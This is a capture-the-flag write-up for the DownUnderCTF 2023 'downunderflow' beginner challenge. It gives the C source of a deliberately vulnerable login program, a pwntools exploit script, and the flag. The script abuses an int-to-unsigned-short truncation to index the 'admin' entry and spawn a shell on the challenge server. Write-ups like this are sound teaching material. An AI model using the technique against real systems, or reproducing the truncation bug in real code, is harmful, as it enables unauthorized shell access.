CTF/DownUnderCTF 2023/beginner/downunderflow/README.md

# downunderflow
```
It's important to see things from different perspectives.

Author: joseph
nc 2023.ductf.dev 30025 
```

# Source 

## downunderflow.c

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define USERNAME_LEN 6
#define NUM_USERS 8
char logins[NUM_USERS][USERNAME_LEN] = { "user0", "user1", "user2", "user3", "user4", "user5", "user6", "admin" };

void init() {
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stdin, 0, 2, 0);
}

int read_int_lower_than(int bound) {
    int x;
    scanf("%d", &x);
    if(x >= bound) {
        puts("Invalid input!");
        exit(1);
    }
    return x;
}

int main() {
    init();

    printf("Select user to log in as: ");
    unsigned short idx = read_int_lower_than(NUM_USERS - 1);
    printf("Logging in as %s\n", logins[idx]);
    if(strncmp(logins[idx], "admin", 5) == 0) {
        puts("Welcome admin.");
        system("/bin/sh");
    } else {
        system("/bin/date");
    }
}
```

# Lösung

```python
from pwn import *
import os

gs = '''
unset env LINES
unset env COLUMNS
set follow-fork-mode child
br *read_int_lower_than+57
br *main + 146
br *main + 49
c
x/d $rbp-0x14
'''

elf = ELF(os.getcwd()+"/downunderflow")

def start():
    if args.GDB:
        return gdb.debug(elf.path, gs)
    if args.REMOTE:
        return remote("2023.ductf.dev", 30025)
    else:
        return process(os.getcwd()+"/downunderflow")

io = start()

print(io.recvuntil("Select user to log in as: "))
io.sendline(str(0x1234567890120007).encode())


io.interactive()
```

=> `DUCTF{-65529_==_7_(mod_65536)}`